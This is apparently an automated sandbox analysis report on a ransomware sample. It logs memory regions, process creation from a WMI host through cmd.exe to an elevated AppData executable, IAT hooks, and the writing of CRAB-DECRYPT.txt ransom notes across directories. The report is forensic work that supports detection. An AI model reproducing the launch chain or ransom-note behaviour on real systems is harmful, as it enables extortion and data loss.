bcrypt.dll 0x7ff9a8150000 0x7ff9a8178fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x7ff9a8220000 0x7ff9a8233fff Memory Mapped File Readable, Writable, Executable False False False -
kernel.appcore.dll 0x7ff9a8250000 0x7ff9a825efff Memory Mapped File Readable, Writable, Executable False False False -
powrprof.dll 0x7ff9a8260000 0x7ff9a82aafff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x7ff9a82b0000 0x7ff9a8319fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x7ff9a8320000 0x7ff9a8507fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x7ff9a9000000 0x7ff9a905afff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x7ff9a9070000 0x7ff9a91f5fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x7ff9a9200000 0x7ff9a931bfff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x7ff9a9320000 0x7ff9a93bcfff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x7ff9a93c0000 0x7ff9a942afff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x7ff9a9430000 0x7ff9a94f0fff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x7ff9a9500000 0x7ff9a9655fff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x7ff9a9aa0000 0x7ff9a9b46fff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x7ff9ab6b0000 0x7ff9ab75cfff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x7ff9ab870000 0x7ff9ab916fff Memory Mapped File Readable, Writable, Executable False False False -
combase.dll 0x7ff9ab920000 0x7ff9abb9cfff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x7ff9abc00000 0x7ff9abdc0fff Memory Mapped File Readable, Writable, Executable False False False -
Process #19: cmd.exe
52 0
»
Information Value
ID #19
File Name c:\windows\system32\cmd.exe
Command Line cmd /c start C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:02:57, Reason: Child Process
Unmonitor End Time: 00:03:23, Reason: Terminated by Timeout
Monitor Duration 00:00:26
OS Process Information
»
Information Value
PID 0x6fc
Parent PID 0xc50 (c:\windows\system32\wbem\wmiprvse.exe)
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username X2VS1CUM\Nd9E1FYi
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x 700
0x CEC
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x0000009b58e00000 0x9b58e00000 0x9b58ffffff Private Memory Readable, Writable True False False -
private_0x0000009b59000000 0x9b59000000 0x9b590fffff Private Memory Readable, Writable True False False -
private_0x0000009b59100000 0x9b59100000 0x9b591fffff Private Memory Readable, Writable True False False -
private_0x0000027890d50000 0x27890d50000 0x27890d6ffff Private Memory Readable, Writable True False False -
pagefile_0x0000027890d50000 0x27890d50000 0x27890d5ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000027890d60000 0x27890d60000 0x27890d66fff Private Memory Readable, Writable True False False -
pagefile_0x0000027890d70000 0x27890d70000 0x27890d84fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000027890d90000 0x27890d90000 0x27890d93fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000027890da0000 0x27890da0000 0x27890da0fff Pagefile Backed Memory Readable True False False -
private_0x0000027890db0000 0x27890db0000 0x27890db1fff Private Memory Readable, Writable True False False -
locale.nls 0x27890dc0000 0x27890e7dfff Memory Mapped File Readable False False False -
private_0x0000027890e80000 0x27890e80000 0x27890e86fff Private Memory Readable, Writable True False False -
private_0x0000027890f30000 0x27890f30000 0x27890f3ffff Private Memory Readable, Writable True False False -
private_0x0000027890f40000 0x27890f40000 0x2789103ffff Private Memory Readable, Writable True False False -
pagefile_0x00007df5ffc50000 0x7df5ffc50000 0x7ff5ffc4ffff Pagefile Backed Memory - True False False -
pagefile_0x00007ff7e5e10000 0x7ff7e5e10000 0x7ff7e5f0ffff Pagefile Backed Memory Readable True False False -
pagefile_0x00007ff7e5f10000 0x7ff7e5f10000 0x7ff7e5f32fff Pagefile Backed Memory Readable True False False -
cmd.exe 0x7ff7e6a00000 0x7ff7e6a59fff Memory Mapped File Readable, Writable, Executable True False False -
kernelbase.dll 0x7ff9a8320000 0x7ff9a8507fff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x7ff9a9320000 0x7ff9a93bcfff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x7ff9ab6b0000 0x7ff9ab75cfff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x7ff9abc00000 0x7ff9abdc0fff Memory Mapped File Readable, Writable, Executable False False False -
Host Behavior
File (13)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Windows\system32 type = file_attributes True 1
Fn
Get Info C:\Windows\System32 type = file_attributes True 1
Fn
Open STD_OUTPUT_HANDLE - True 6
Fn
Open STD_INPUT_HANDLE - True 4
Fn
Open STD_ERROR_HANDLE - True 1
Fn
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Process (1)
»
Operation Process Additional Information Success Count Logfile
Create C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe os_pid = 0xcf0, creation_flags = CREATE_NEW_CONSOLE, CREATE_UNICODE_ENVIRONMENT, CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL True 1
Fn
Thread (1)
»
Operation Process Additional Information Success Count Logfile
Resume c:\windows\system32\cmd.exe os_tid = 0x700 True 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\system32\cmd.exe base_address = 0x7ff7e6a00000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x7ff9ab6b0000 True 2
Fn
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\system32\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x7ff9ab6d3270 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x7ff9ab6d8940 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x7ff9ab6d7460 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x7ff9a8376e50 True 1
Fn
Environment (12)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 4
Fn
Data
Get Environment String name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ True 1
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 2
Fn
Get Environment String name = PROMPT False 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Set Environment String name = PROMPT, value = $P$G True 1
Fn
Set Environment String name = =C:, value = C:\Windows\System32 True 1
Fn
Process #21: roamingqtp35.exe
5867 22
»
Information Value
ID #21
File Name c:\users\nd9e1fyi\appdata\roamingqtp35.exe
Command Line C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe
Initial Working Directory C:\Windows\system32\
Monitor Start Time: 00:02:57, Reason: Child Process
Unmonitor End Time: 00:03:23, Reason: Terminated by Timeout
Monitor Duration 00:00:26
OS Process Information
»
Information Value
PID 0xcf0
Parent PID 0x6fc (c:\windows\system32\cmd.exe)
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username X2VS1CUM\Nd9E1FYi
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x CF4
0x CFC
0x C34
0x D00
0x D08
0x D10
0x D14
0x D18
0x D3C
0x 44C
0x 8B8
Region
»
Name Start VA End VA Type Permissions Monitored Dumped YARA Actions
private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000020000 0x00020000 0x00020fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False -
private_0x0000000000030000 0x00030000 0x00030fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000040000 0x00040000 0x00054fff Pagefile Backed Memory Readable True False False -
private_0x0000000000060000 0x00060000 0x0009ffff Private Memory Readable, Writable True False False -
private_0x0000000000060000 0x00060000 0x00060fff Private Memory Readable, Writable True False False -
private_0x0000000000060000 0x00060000 0x0006ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000000060000 0x00060000 0x00065fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000070000 0x00070000 0x00070fff Private Memory Readable, Writable True False False -
private_0x0000000000070000 0x00070000 0x0016ffff Private Memory Readable, Writable True False False -
private_0x0000000000080000 0x00080000 0x00080fff Private Memory Readable, Writable True False False -
private_0x0000000000090000 0x00090000 0x00090fff Private Memory Readable, Writable, Executable True False False -
private_0x00000000000a0000 0x000a0000 0x0019ffff Private Memory Readable, Writable True False False -
private_0x0000000000170000 0x00170000 0x00183fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000170000 0x00170000 0x00175fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000000170000 0x00170000 0x00170fff Private Memory Readable, Writable True False False -
private_0x0000000000180000 0x00180000 0x00180fff Private Memory Readable, Writable True False False -
pagefile_0x0000000000180000 0x00180000 0x00181fff Pagefile Backed Memory Readable True False False -
private_0x0000000000190000 0x00190000 0x00190fff Private Memory Readable, Writable, Executable True False False -
pagefile_0x00000000001a0000 0x001a0000 0x001a3fff Pagefile Backed Memory Readable True False False -
pagefile_0x00000000001b0000 0x001b0000 0x001b0fff Pagefile Backed Memory Readable True False False -
private_0x00000000001c0000 0x001c0000 0x001c1fff Private Memory Readable, Writable True False False -
private_0x00000000001d0000 0x001d0000 0x001d3fff Private Memory Readable, Writable True False False -
private_0x00000000001e0000 0x001e0000 0x001f5fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000000200000 0x00200000 0x003fffff Private Memory Readable, Writable True False False -
roamingqtp35.exe 0x00400000 0x0044afff Memory Mapped File Readable, Writable, Executable True True False
...
private_0x0000000000450000 0x00450000 0x0048ffff Private Memory Readable, Writable True False False -
private_0x0000000000490000 0x00490000 0x004b3fff Private Memory Readable, Writable True False False -
private_0x0000000000490000 0x00490000 0x00490fff Private Memory Readable, Writable True False False -
private_0x00000000004a0000 0x004a0000 0x004a0fff Private Memory Readable, Writable, Executable True False False -
pagefile_0x00000000004a0000 0x004a0000 0x004a0fff Pagefile Backed Memory Readable, Writable True False False -
private_0x00000000004b0000 0x004b0000 0x004b0fff Private Memory Readable, Writable True False False -
private_0x00000000004c0000 0x004c0000 0x005bffff Private Memory Readable, Writable True False False -
private_0x00000000005c0000 0x005c0000 0x005fffff Private Memory Readable, Writable True False False -
private_0x0000000000600000 0x00600000 0x0060ffff Private Memory Readable, Writable True False False -
locale.nls 0x00610000 0x006cdfff Memory Mapped File Readable False False False -
private_0x00000000006d0000 0x006d0000 0x007cffff Private Memory Readable, Writable True False False -
pagefile_0x00000000007d0000 0x007d0000 0x00957fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000960000 0x00960000 0x00ae0fff Pagefile Backed Memory Readable True False False -
pagefile_0x0000000000af0000 0x00af0000 0x01eeffff Pagefile Backed Memory Readable True False False -
private_0x0000000001ef0000 0x01ef0000 0x01f4ffff Private Memory Readable, Writable True False False -
private_0x0000000001ef0000 0x01ef0000 0x01ef0fff Private Memory Readable, Writable True False False -
private_0x0000000001f00000 0x01f00000 0x01f00fff Private Memory Readable, Writable True False False -
private_0x0000000001f10000 0x01f10000 0x01f10fff Private Memory Readable, Writable True False False -
private_0x0000000001f20000 0x01f20000 0x01f20fff Private Memory Readable, Writable True False False -
private_0x0000000001f30000 0x01f30000 0x01f30fff Private Memory Readable, Writable True False False -
private_0x0000000001f40000 0x01f40000 0x01f4ffff Private Memory Readable, Writable True False False -
private_0x0000000001f50000 0x01f50000 0x02050fff Private Memory Readable, Writable True False False -
private_0x0000000001f50000 0x01f50000 0x0213ffff Private Memory Readable, Writable True False False -
private_0x0000000001f50000 0x01f50000 0x020cffff Private Memory Readable, Writable True False False -
private_0x0000000001f50000 0x01f50000 0x0204ffff Private Memory Readable, Writable True False False -
private_0x0000000002050000 0x02050000 0x02050fff Private Memory Readable, Writable True False False -
private_0x0000000002060000 0x02060000 0x02060fff Private Memory Readable, Writable True False False -
private_0x0000000002070000 0x02070000 0x02070fff Private Memory Readable, Writable True False False -
private_0x0000000002080000 0x02080000 0x02080fff Private Memory Readable, Writable True False False -
private_0x0000000002090000 0x02090000 0x0209ffff Private Memory Readable, Writable True False False -
private_0x0000000002090000 0x02090000 0x020a3fff Private Memory Readable, Writable True False False -
pagefile_0x0000000002090000 0x02090000 0x02095fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000002090000 0x02090000 0x02090fff Private Memory Readable, Writable True False False -
pagefile_0x00000000020a0000 0x020a0000 0x020a0fff Pagefile Backed Memory Readable, Writable True False False -
pagefile_0x00000000020b0000 0x020b0000 0x020b5fff Pagefile Backed Memory Readable, Writable True False False -
counters.dat 0x020b0000 0x020b0fff Memory Mapped File Readable, Writable True True False
...
private_0x00000000020c0000 0x020c0000 0x020cffff Private Memory Readable, Writable True False False -
private_0x00000000020d0000 0x020d0000 0x0210ffff Private Memory Readable, Writable True False False -
private_0x0000000002110000 0x02110000 0x02112fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000002110000 0x02110000 0x02127fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000002120000 0x02120000 0x02122fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000002130000 0x02130000 0x0213ffff Private Memory Readable, Writable True False False -
sortdefault.nls 0x02140000 0x02476fff Memory Mapped File Readable False False False -
pagefile_0x0000000002480000 0x02480000 0x0287afff Pagefile Backed Memory Readable True False False -
ole32.dll 0x02880000 0x02969fff Memory Mapped File Readable False False False -
private_0x0000000002880000 0x02880000 0x0297ffff Private Memory Readable, Writable True False False -
private_0x0000000002980000 0x02980000 0x029bffff Private Memory Readable, Writable True False False -
private_0x00000000029c0000 0x029c0000 0x02abffff Private Memory Readable, Writable True False False -
private_0x0000000002ac0000 0x02ac0000 0x02afffff Private Memory Readable, Writable True False False -
private_0x0000000002b00000 0x02b00000 0x02bfffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002c00000 0x02c00000 0x02c00fff Pagefile Backed Memory Readable, Writable True False False -
private_0x0000000002c10000 0x02c10000 0x02c4ffff Private Memory Readable, Writable True False False -
private_0x0000000002c50000 0x02c50000 0x02d4ffff Private Memory Readable, Writable True False False -
private_0x0000000002d50000 0x02d50000 0x02d8ffff Private Memory Readable, Writable True False False -
private_0x0000000002d90000 0x02d90000 0x02e8ffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002e90000 0x02e90000 0x02e90fff Pagefile Backed Memory Readable True False False -
private_0x0000000002ea0000 0x02ea0000 0x02edffff Private Memory Readable, Writable True False False -
private_0x0000000002ee0000 0x02ee0000 0x02fdffff Private Memory Readable, Writable True False False -
pagefile_0x0000000002fe0000 0x02fe0000 0x02feffff Pagefile Backed Memory Readable True False False -
private_0x0000000002ff0000 0x02ff0000 0x02ff0fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000003000000 0x03000000 0x03000fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000003000000 0x03000000 0x03008fff Private Memory Readable, Writable, Executable True False False -
private_0x0000000003010000 0x03010000 0x03055fff Private Memory Readable, Writable True False False -
private_0x0000000003010000 0x03010000 0x03010fff Private Memory Readable, Writable True False False -
private_0x0000000003020000 0x03020000 0x03020fff Private Memory Readable, Writable True False False -
private_0x0000000003060000 0x03060000 0x03060fff Private Memory Readable, Writable True False False -
private_0x0000000003070000 0x03070000 0x03070fff Private Memory Readable, Writable True False False -
private_0x0000000003080000 0x03080000 0x03080fff Private Memory Readable, Writable True False False -
wow64win.dll 0x542b0000 0x54329fff Memory Mapped File Readable, Writable, Executable False False False -
wow64.dll 0x54330000 0x5437ffff Memory Mapped File Readable, Writable, Executable False False False -
wow64cpu.dll 0x54380000 0x54387fff Memory Mapped File Readable, Writable, Executable False False False -
msvcr100.dll 0x6f970000 0x6fa2efff Memory Mapped File Readable, Writable, Executable False False False -
rsaenh.dll 0x6fa30000 0x6fa5efff Memory Mapped File Readable, Writable, Executable False False False -
cryptsp.dll 0x6fa60000 0x6fa72fff Memory Mapped File Readable, Writable, Executable False False False -
userenv.dll 0x6fbd0000 0x6fbe8fff Memory Mapped File Readable, Writable, Executable False False False -
winnsi.dll 0x6fc70000 0x6fc77fff Memory Mapped File Readable, Writable, Executable False False False -
winhttp.dll 0x6fcf0000 0x6fd8afff Memory Mapped File Readable, Writable, Executable False False False -
ondemandconnroutehelper.dll 0x6fd90000 0x6fda1fff Memory Mapped File Readable, Writable, Executable False False False -
wininet.dll 0x6fdc0000 0x6ffccfff Memory Mapped File Readable, Writable, Executable False False False -
urlmon.dll 0x6ffd0000 0x7014dfff Memory Mapped File Readable, Writable, Executable False False False -
fwpuclnt.dll 0x71540000 0x71586fff Memory Mapped File Readable, Writable, Executable False False False -
rasadhlp.dll 0x71590000 0x71597fff Memory Mapped File Readable, Writable, Executable False False False -
iphlpapi.dll 0x715a0000 0x715cefff Memory Mapped File Readable, Writable, Executable False False False -
dnsapi.dll 0x715d0000 0x71653fff Memory Mapped File Readable, Writable, Executable False False False -
mswsock.dll 0x71660000 0x716aefff Memory Mapped File Readable, Writable, Executable False False False -
iertutil.dll 0x71720000 0x719eafff Memory Mapped File Readable, Writable, Executable False False False -
bcrypt.dll 0x73860000 0x7387afff Memory Mapped File Readable, Writable, Executable False False False -
cryptbase.dll 0x73bb0000 0x73bb9fff Memory Mapped File Readable, Writable, Executable False False False -
sspicli.dll 0x73bc0000 0x73bddfff Memory Mapped File Readable, Writable, Executable False False False -
nsi.dll 0x73be0000 0x73be6fff Memory Mapped File Readable, Writable, Executable False False False -
combase.dll 0x73bf0000 0x73dacfff Memory Mapped File Readable, Writable, Executable False False False -
kernel.appcore.dll 0x73db0000 0x73dbbfff Memory Mapped File Readable, Writable, Executable False False False -
oleaut32.dll 0x73ee0000 0x73f71fff Memory Mapped File Readable, Writable, Executable False False False -
powrprof.dll 0x73f80000 0x73fc3fff Memory Mapped File Readable, Writable, Executable False False False -
ws2_32.dll 0x740c0000 0x7411efff Memory Mapped File Readable, Writable, Executable False False False -
kernel32.dll 0x74120000 0x741fffff Memory Mapped File Readable, Writable, Executable False False False -
msvcrt.dll 0x74300000 0x743bdfff Memory Mapped File Readable, Writable, Executable False False False -
imm32.dll 0x74530000 0x7455afff Memory Mapped File Readable, Writable, Executable False False False -
psapi.dll 0x74560000 0x74565fff Memory Mapped File Readable, Writable, Executable False False False -
rpcrt4.dll 0x74610000 0x746bcfff Memory Mapped File Readable, Writable, Executable False False False -
windows.storage.dll 0x746c0000 0x74bb8fff Memory Mapped File Readable, Writable, Executable False False False -
shcore.dll 0x74bc0000 0x74c4cfff Memory Mapped File Readable, Writable, Executable False False False -
crypt32.dll 0x74c50000 0x74dc7fff Memory Mapped File Readable, Writable, Executable False False False -
shlwapi.dll 0x74f10000 0x74f54fff Memory Mapped File Readable, Writable, Executable False False False -
profapi.dll 0x74f60000 0x74f6efff Memory Mapped File Readable, Writable, Executable False False False -
bcryptprimitives.dll 0x74fd0000 0x75027fff Memory Mapped File Readable, Writable, Executable False False False -
sechost.dll 0x75090000 0x750d3fff Memory Mapped File Readable, Writable, Executable False False False -
shell32.dll 0x750e0000 0x764defff Memory Mapped File Readable, Writable, Executable False False False -
gdi32.dll 0x764e0000 0x7662efff Memory Mapped File Readable, Writable, Executable False False False -
clbcatq.dll 0x76630000 0x766b3fff Memory Mapped File Readable, Writable, Executable False False False -
kernelbase.dll 0x766c0000 0x7683dfff Memory Mapped File Readable, Writable, Executable False False False -
user32.dll 0x76840000 0x76986fff Memory Mapped File Readable, Writable, Executable False False False -
advapi32.dll 0x76dc0000 0x76e3afff Memory Mapped File Readable, Writable, Executable False False False -
cfgmgr32.dll 0x76e40000 0x76e76fff Memory Mapped File Readable, Writable, Executable False False False -
msasn1.dll 0x76e80000 0x76e8dfff Memory Mapped File Readable, Writable, Executable False False False -
ntdll.dll 0x76e90000 0x7700afff Memory Mapped File Readable, Writable, Executable False False False -
pagefile_0x000000007feb0000 0x7feb0000 0x7ffaffff Pagefile Backed Memory Readable True False False -
pagefile_0x000000007ffb0000 0x7ffb0000 0x7ffd2fff Pagefile Backed Memory Readable True False False -
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False -
private_0x000000007fff0000 0x7fff0000 0x7ff9abbfffff Private Memory Readable True False False -
ntdll.dll 0x7ff9abc00000 0x7ff9abdc0fff Memory Mapped File Readable, Writable, Executable False False False -
private_0x00007ff9abdc1000 0x7ff9abdc1000 0x7ffffffeffff Private Memory Readable True False False -
For performance reasons, the remaining 78 entries are omitted.
The remaining entries can be found in flog.txt.
Hook Information
»
Type Installer Target Size Information Actions
IAT private_0x00000000004c0000:+0x696e4 11. entry of roamingqtp35.exe 4 bytes kernel32.dll:GetCommTimeouts+0x0 now points to private_0x000000007fff0000:+0x51fd5215
...
IAT private_0x00000000004c0000:+0x696e4 15. entry of roamingqtp35.exe 4 bytes kernel32.dll:CompareStringA+0x0 now points to private_0x000000007fff0000:+0x52ddfb55
...
IAT private_0x00000000004c0000:+0x696e4 20. entry of roamingqtp35.exe 4 bytes kernel32.dll:WriteConsoleW+0x0 now points to private_0x000000007fff0000:+0x7b046002
...
IAT private_0x00000000004c0000:+0x696e4 21. entry of roamingqtp35.exe 4 bytes kernel32.dll:GetConsoleOutputCP+0x0 now points to private_0x000000007fff0000:+0x7516097b
...
IAT private_0x00000000004c0000:+0x696e4 22. entry of roamingqtp35.exe 4 bytes kernel32.dll:WriteConsoleA+0x0 now points to private_0x000000007fff0000:+0x2046cd6
...
IAT private_0x00000000004c0000:+0x696e4 27. entry of roamingqtp35.exe 4 bytes kernel32.dll:SetHandleCount+0x0 now points to private_0x000000007fff0000:+0x25161fce
...
IAT private_0x00000000004c0000:+0x696e4 30. entry of roamingqtp35.exe 4 bytes kernel32.dll:GetStartupInfoA+0x0 now points to private_0x000000007fff0000:+0x7cd8fa5c
...
IAT private_0x00000000004c0000:+0x696e4 31. entry of roamingqtp35.exe 4 bytes ntdll.dll:RtlDeleteCriticalSection+0x0 now points to private_0x000000007fff0000:+0x9242e76
...
IAT private_0x00000000004c0000:+0x696e4 32. entry of roamingqtp35.exe 4 bytes kernel32.dll:TerminateProcess+0x0 now points to private_0x000000007fff0000:+0x5dcf6b3b
...
IAT private_0x00000000004c0000:+0x696e4 33. entry of roamingqtp35.exe 4 bytes kernel32.dll:GetCurrentProcess+0x0 now points to private_0x000000007fff0000:+0x7d6a5255
...
IAT private_0x00000000004c0000:+0x696e4 35. entry of roamingqtp35.exe 4 bytes kernel32.dll:SetUnhandledExceptionFilter+0x0 now points to private_0x000000007fff0000:+0x6c633147
...
IAT private_0x00000000004c0000:+0x696e4 36. entry of roamingqtp35.exe 4 bytes kernel32.dll:IsDebuggerPresent+0x0 now points to private_0x000000007fff0000:+0x750303f9
...
IAT private_0x00000000004c0000:+0x696e4 39. entry of roamingqtp35.exe 4 bytes kernel32.dll:ExitProcess+0x0 now points to private_0x000000007fff0000:+0x7f836a17
...
IAT private_0x00000000004c0000:+0x696e4 40. entry of roamingqtp35.exe 4 bytes kernel32.dll:WriteFile+0x0 now points to private_0x000000007fff0000:+0x4e7c1f04
...
IAT private_0x00000000004c0000:+0x696e4 42. entry of roamingqtp35.exe 4 bytes kernel32.dll:GetModuleFileNameW+0x0 now points to private_0x000000007fff0000:+0x57fd5c12
...
IAT private_0x00000000004c0000:+0x696e4 44. entry of roamingqtp35.exe 4 bytes kernel32.dll:GetEnvironmentStringsW+0x0 now points to private_0x000000007fff0000:+0x7d463088
...
IAT private_0x00000000004c0000:+0x696e4 49. entry of roamingqtp35.exe 4 bytes kernel32.dll:TlsFree+0x0 now points to private_0x000000007fff0000:+0x24ba1fce
...
IAT private_0x00000000004c0000:+0x696e4 50. entry of roamingqtp35.exe 4 bytes kernel32.dll:InterlockedIncrement+0x0 now points to private_0x000000007fff0000:+0x433a1203
...
IAT private_0x00000000004c0000:+0x696e4 73. entry of roamingqtp35.exe 4 bytes kernel32.dll:LoadLibraryA+0x0 now points to private_0x000000007fff0000:+0x3a3e0fa5
...
IAT private_0x00000000004c0000:+0x696e4 76. entry of roamingqtp35.exe 4 bytes ntdll.dll:RtlReAllocateHeap+0x0 now points to private_0x000000007fff0000:+0x936cdce
...
IAT private_0x00000000004c0000:+0x696e4 83. entry of roamingqtp35.exe 4 bytes kernel32.dll:GetStringTypeA+0x0 now points to private_0x000000007fff0000:+0xedafd55
...
IAT private_0x00000000004c0000:+0x696e4 86. entry of roamingqtp35.exe 4 bytes kernel32.dll:GetDateFormatA+0x0 now points to private_0x000000007fff0000:+0x44872e26
...
IAT private_0x00000000004c0000:+0x696e4 90. entry of roamingqtp35.exe 4 bytes kernel32.dll:IsValidLocale+0x0 now points to private_0x000000007fff0000:+0xe5dea1e
...
IAT private_0x00000000004c0000:+0x696e4 92. entry of roamingqtp35.exe 4 bytes ntdll.dll:RtlSizeHeap+0x0 now points to private_0x000000007fff0000:+0x26dafb13
...
IAT private_0x00000000004c0000:+0x696e4 96. entry of roamingqtp35.exe 4 bytes user32.dll:GetProcessWindowStation+0x0 now points to private_0x000000007fff0000:+0x3056d04
...
Host Behavior
File (2162)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\Nd9E1FYi\AppData\RoamingqTP35.exe desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\$Recycle.Bin\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\$Recycle.Bin\S-1-5-18\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\$Recycle.Bin\S-1-5-21-2172869166-1497266965-2109836178-1000\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Documents and Settings\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Documents and Settings\Default\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
